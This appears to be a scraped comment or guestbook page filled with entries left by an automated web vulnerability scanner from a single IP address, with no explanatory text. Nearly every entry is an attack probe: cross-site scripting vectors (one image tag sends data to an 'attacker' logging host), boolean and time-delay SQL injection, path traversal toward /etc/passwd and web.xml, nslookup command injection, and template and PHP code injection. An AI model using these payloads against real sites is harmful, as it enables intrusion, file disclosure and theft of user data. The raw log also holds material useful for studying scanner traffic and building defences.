e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:39:10

1

e [116.113.93.82] 2020-10-28 21:39:10

response.write(9739096*9696726)

e [] 2020-10-28 21:39:09

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:39:09

1

e [-1' OR 2+714-714-1=0+0+0+1 -- ] 2020-10-28 21:39:09

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:39:08

1

e [-1 OR 2+150-150-1=0+0+0+1] 2020-10-28 21:39:07

1

e [116.113.93.82] 2020-10-28 21:39:07

W4Vla9Dx

e [&nslookup uQ4VIlUS&'\"`0&nslookup uQ4VIlUS&`'] 2020-10-28 21:39:07

1

e [-1 OR 2+72-72-1=0+0+0+1 -- ] 2020-10-28 21:39:06

1

e [$(nslookup jEObaQ9b)] 2020-10-28 21:39:05

1

e [L0CXb7x1] 2020-10-28 21:39:05

1

e ["+response.write(9785867*9798377)+"] 2020-10-28 21:39:05

1

e [QxB34eoV] 2020-10-28 21:39:05

1

e [116.113.93.82] 2020-10-28 21:39:04

1

e [set|set&set] 2020-10-28 21:39:04

1

e ['+response.write(9785867*9798377)+'] 2020-10-28 21:39:04

1

e [116.113.93.82] 2020-10-28 21:39:03

1

e [response.write(9785867*9798377)] 2020-10-28 21:39:03

1

e [116.113.93.82] 2020-10-28 21:38:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:50:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:50:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:50:48

1

GRLpGpAG"><script>pN9G(9861)</script> [116.113.93.82] 2020-10-28 20:50:46

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(pN9G(9692))'bad=" [116.113.93.82] 2020-10-28 20:50:44

1

[116.113.93.82] 2020-10-28 20:50:41

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%70%4E%39%47%28%39%32%39%30%29%22 [116.113.93.82] 2020-10-28 20:50:39

1

GRLpGpAG\u0022onmouseover=pN9G(9978)\u0022 [116.113.93.82] 2020-10-28 20:50:37

1

GRLpGpAG" Ivz7=pN9G([!+!]) u5k=" [116.113.93.82] 2020-10-28 20:50:34

1

GRLpGpAG"onmouseover=pN9G(9024)" [116.113.93.82] 2020-10-28 20:50:32

1

GRLpGpAG<MdJZkf< [116.113.93.82] 2020-10-28 20:50:29

1

GRLpGpAG<img sRc='http://attacker-9249/log.php? [116.113.93.82] 2020-10-28 20:50:28

1

GRLpGpAG<MiGtt0 x=9641> [116.113.93.82] 2020-10-28 20:50:26

1

GRLpGpAG<ifRAme sRc=9218.com></IfRamE> [116.113.93.82] 2020-10-28 20:50:23

1

GRLpGpAG<WCZQUL>XURE1[!+!]</WCZQUL> [116.113.93.82] 2020-10-28 20:50:21

1

GRLpGpAGiQwmA <ScRiPt >pN9G(9013)</ScRiPt> [116.113.93.82] 2020-10-28 20:50:18

1

GRLpGpAG<% contenteditable onresize=pN9G(9367)> [116.113.93.82] 2020-10-28 20:50:17

1

GRLpGpAG}body{acu:Expre/**/SSion(pN9G(9547))} [116.113.93.82] 2020-10-28 20:50:14

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9034);//><!-- --> [116.113.93.82] 2020-10-28 20:50:11

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 20:50:09

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 20:50:07

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 20:50:04

1

GRLpGpAG<input autofocus onfocus=pN9G(9771)> [116.113.93.82] 2020-10-28 20:50:02

1

[116.113.93.82] 2020-10-28 20:49:59

1

GRLpGpAG<ScRiPt>pN9G(9081)</sCripT> [116.113.93.82] 2020-10-28 20:49:57

1

GRLpGpAG\u003CScRiPt\pN9G(9252)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 20:49:55

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%70%4E%39%47%289253%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 20:49:53

1

GRLpGpAG<img/src=">" onerror=alert(9059)> [116.113.93.82] 2020-10-28 20:49:49

1

GRLpGpAG<img src=xyz OnErRor=pN9G(9844)> [116.113.93.82] 2020-10-28 20:49:48

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=pN9G(9058)> [116.113.93.82] 2020-10-28 20:49:45

1

GRLpGpAG<body onload=pN9G(9352)> [116.113.93.82] 2020-10-28 20:49:43

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9751'> [116.113.93.82] 2020-10-28 20:49:40

1

GRLpGpAG<isindex type=image src=1 onerror=pN9G(9939)> [116.113.93.82] 2020-10-28 20:49:38

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 20:49:36

1

GRLpGpAG<video><source onerror="javascript:pN9G(9293)"> [116.113.93.82] 2020-10-28 20:49:34

1

GRLpGpAG<ScRiPt >pN9G(9395)</ScRiPt> [116.113.93.82] 2020-10-28 20:49:31

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9377></ScRiPt> [116.113.93.82] 2020-10-28 20:49:29

1

GRLpGpAG<ScRiPt >pN9G(9905)</ScRiPt> [116.113.93.82] 2020-10-28 20:49:27

1

GRLpGpAG<ScR<ScRiPt>IpT>pN9G(9864)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 20:49:24

1

GRLpGpAG<script>pN9G(9617)</script> [116.113.93.82] 2020-10-28 20:49:22

1

GRLpGpAG<WBLAYE>YUGQ9[!+!]</WBLAYE> [116.113.93.82] 2020-10-28 20:49:19

1

GRLpGpAG<ScRiPt >pN9G(9659)</ScRiPt> [116.113.93.82] 2020-10-28 20:49:18

1

{{10000118*9999112}} [116.113.93.82] 2020-10-28 20:49:15

1

acux5415 [116.113.93.82] 2020-10-28 20:49:13

1

acu2516<s1﹥s2ʺs3ʹuca2516 [116.113.93.82] 2020-10-28 20:49:10

1

{{10000028*10000203}} [116.113.93.82] 2020-10-28 20:49:08

1

acux1024 [116.113.93.82] 2020-10-28 20:49:06

1

acu7217<s1﹥s2ʺs3ʹuca7217 [116.113.93.82] 2020-10-28 20:49:04

1

GRLpGpAG9707478 [116.113.93.82] 2020-10-28 20:49:01

1

'"()&%<acx><ScRiPt >pN9G(9081)</ScRiPt> [116.113.93.82] 2020-10-28 20:48:59

1

GRLpGpAG'"()&%<acx><ScRiPt >pN9G(9172)</ScRiPt> [116.113.93.82] 2020-10-28 20:48:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:55

1<Pno4QG<

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:52

1<img sRc='http://attacker-9058/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:50

1<qmfQHc x=9702>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:48

1<ifRAme sRc=9763.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:46

1<WFD4ZB>VKJJK[!+!]</WFD4ZB>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:43

1ndSUH <ScRiPt >pN9G(9115)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:41

1<% contenteditable onresize=pN9G(9821)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:39

1}body{acu:Expre/**/SSion(pN9G(9922))}

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:37

1<img<!-- --> src=x onerror=alert(9396);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:34

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:32

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:29

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:28

1<input autofocus onfocus=pN9G(9213)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:26

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:23

1<ScRiPt>pN9G(9524)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:21

1\u003CScRiPt\pN9G(9533)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:19

%31%3C%53%63%52%69%50%74%20%3E%70%4E%39%47%289854%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:17

1<img/src=">" onerror=alert(9021)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:14

1<img src=xyz OnErRor=pN9G(9707)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:12

1<img src=//testasp.vulnweb.com/t/dot.gif onload=pN9G(9101)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:09

1<body onload=pN9G(9874)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:08

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9781'>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:06

1<isindex type=image src=1 onerror=pN9G(9508)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:03

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 20:48:00

1<video><source onerror="javascript:pN9G(9044)">

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:58

1<ScRiPt >pN9G(9977)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:57

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9098></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:54

1<ScRiPt >pN9G(9006)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:52

1<ScR<ScRiPt>IpT>pN9G(9492)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:50

1<script>pN9G(9598)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:48

1<WCMVQT>5ZE5O[!+!]</WCMVQT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:46

1<ScRiPt >pN9G(9710)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:43

{{9999432*10000106}}

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:41

acux4366

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:38

acu4559<s1﹥s2ʺs3ʹuca4559

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:37

19777476

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:34

'"()&%<acx><ScRiPt >pN9G(9442)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:32

1'"()&%<acx><ScRiPt >pN9G(9908)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:27

1

GRLpGpAG [116.113.93.82<idgwdO<] 2020-10-28 20:47:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:25

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9027/log.php?] 2020-10-28 20:47:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:23

1

GRLpGpAG [116.113.93.82<jcGVdh x=9624>] 2020-10-28 20:47:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:21

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9473.com></IfRamE>] 2020-10-28 20:47:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:18

1

GRLpGpAG [116.113.93.82<WC7WGN>DRSP8[!+!]</WC7WGN>] 2020-10-28 20:47:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:17

1

GRLpGpAG [116.113.93.822RS0K <ScRiPt >pN9G(9499)</ScRiPt>] 2020-10-28 20:47:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:47:16

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=pN9G(9937)>] 2020-10-28 20:47:14

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(pN9G(9339))}] 2020-10-28 20:47:12

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9387);//><!-- -->] 2020-10-28 20:47:10

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 20:47:08

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 20:47:06

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 20:47:03

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=pN9G(9939)>] 2020-10-28 20:47:01

1

GRLpGpAG [] 2020-10-28 20:46:59

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 20:46:57

1

GRLpGpAG [116.113.93.82<ScRiPt>pN9G(9375)</sCripT>] 2020-10-28 20:46:57

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:46:56

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:46:55

1

GRLpGpAG [116.113.93.82\u003CScRiPt\pN9G(9468)\u003C/sCripT\u003E] 2020-10-28 20:46:55

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 20:46:54

1

file:///etc/passwd [116.113.93.82] 2020-10-28 20:46:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:53

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%70%4E%39%47%289453%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 20:46:52

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 20:46:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:52

1

IQz6n8qM'));select pg_sleep(6); -- [116.113.93.82] 2020-10-28 20:46:51

1

.. [116.113.93.82] 2020-10-28 20:46:51

1

aZsQreOB');select pg_sleep(3); -- [116.113.93.82] 2020-10-28 20:46:50

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 20:46:50

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9960)>] 2020-10-28 20:46:50

1

qUHA9wyr';select pg_sleep(3); -- [116.113.93.82] 2020-10-28 20:46:49

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 20:46:49

1

ciTBqnNb'; waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-28 20:46:48

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 20:46:48

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=pN9G(9438)>] 2020-10-28 20:46:48

1

1 waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-28 20:46:47

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 20:46:47

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ [116.113.93.82] 2020-10-28 20:46:47

1

/etc/passwd [116.113.93.82] 2020-10-28 20:46:46

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=pN9G(9554)>] 2020-10-28 20:46:46

1

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z [116.113.93.82] 2020-10-28 20:46:46

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 20:46:45

1

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z [116.113.93.82] 2020-10-28 20:46:45

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 20:46:44

1

if(now()=sysdate(),sleep(9),0) [116.113.93.82] 2020-10-28 20:46:43

1

GRLpGpAG [116.113.93.82<body onload=pN9G(9983)>] 2020-10-28 20:46:43

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 20:46:43

1

-1" OR 2+378-378-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:46:42

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 20:46:42

1

-1' OR 2+68-68-1=0+0+0+1 or 'LoAVoJpu'=' [116.113.93.82] 2020-10-28 20:46:41

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 20:46:41

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9348'>] 2020-10-28 20:46:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:40

1

-1' OR 2+125-125-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:46:40

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 20:46:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:39

1

-1 OR 2+367-367-1=0+0+0+1 [116.113.93.82] 2020-10-28 20:46:39

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 20:46:39

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=pN9G(9810)>] 2020-10-28 20:46:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:39

1

-1 OR 2+707-707-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:46:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:38

WEB-INF\web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:38

1

1kK7OWwm [116.113.93.82] 2020-10-28 20:46:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:38

WEB-INF/web.xml

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 20:46:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:37

/WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:36

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82<video><source onerror="javascript:pN9G(9915)">] 2020-10-28 20:46:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:35

dxIrX6QI'));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:35

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:34

rR0tNS76');select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:34

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:33

bFIBdhWU';select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:33

..

GRLpGpAG [116.113.93.82<ScRiPt >pN9G(9166)</ScRiPt>] 2020-10-28 20:46:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:32

-1));select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:32

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:31

-1);select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:30

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9674></ScRiPt>] 2020-10-28 20:46:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:29

-1;select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:29

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:29

3oHbompy'; waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:28

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82<ScRiPt >pN9G(9739)</ScRiPt>] 2020-10-28 20:46:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:28

1 waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:28

/etc/passwd

[116.113.93.82] 2020-10-28 20:46:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:27

-1); waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:27

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>pN9G(9320)</sCr<ScRiPt>IpT>] 2020-10-28 20:46:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:26

-1; waitfor delay '0:0:6' --

[116.113.93.82] 2020-10-28 20:46:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:26

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:25

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

JyI= [116.113.93.82] 2020-10-28 20:46:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:25

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82<script>pN9G(9319)</script>] 2020-10-28 20:46:24

1

@@B0qEm [116.113.93.82] 2020-10-28 20:46:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:24

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:24

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:23

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

1 [116.113.93.82] 2020-10-28 20:46:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:23

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:22

if(now()=sysdate(),sleep(3),0)

GRLpGpAG [116.113.93.82<WJTJZA>44VDD[!+!]</WJTJZA>] 2020-10-28 20:46:22

1

\ [116.113.93.82] 2020-10-28 20:46:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:21

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:21

-1" OR 2+201-201-1=0+0+0+1 --

1'" [116.113.93.82] 2020-10-28 20:46:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:20

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:20

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:20

-1' OR 2+75-75-1=0+0+0+1 or 'Y37PwmZR'='

GRLpGpAG [116.113.93.82<ScRiPt >pN9G(9730)</ScRiPt>] 2020-10-28 20:46:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:19

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:19

-1' OR 2+516-516-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:18

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:18

-1 OR 2+929-929-1=0+0+0+1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:18

1

GRLpGpAG [{{9999099*10000143}}] 2020-10-28 20:46:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:17

@@IbR1I

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:17

-1 OR 2+686-686-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:16

kFmwBJi3

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:16

1

GRLpGpAG [acux5783] 2020-10-28 20:46:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:15

\

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:14

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:14

1

GRLpGpAG [acu5402<s1﹥s2ʺs3ʹuca5402] 2020-10-28 20:46:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:12

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 20:46:12

1

<!-- [116.113.93.82] 2020-10-28 20:46:12

1

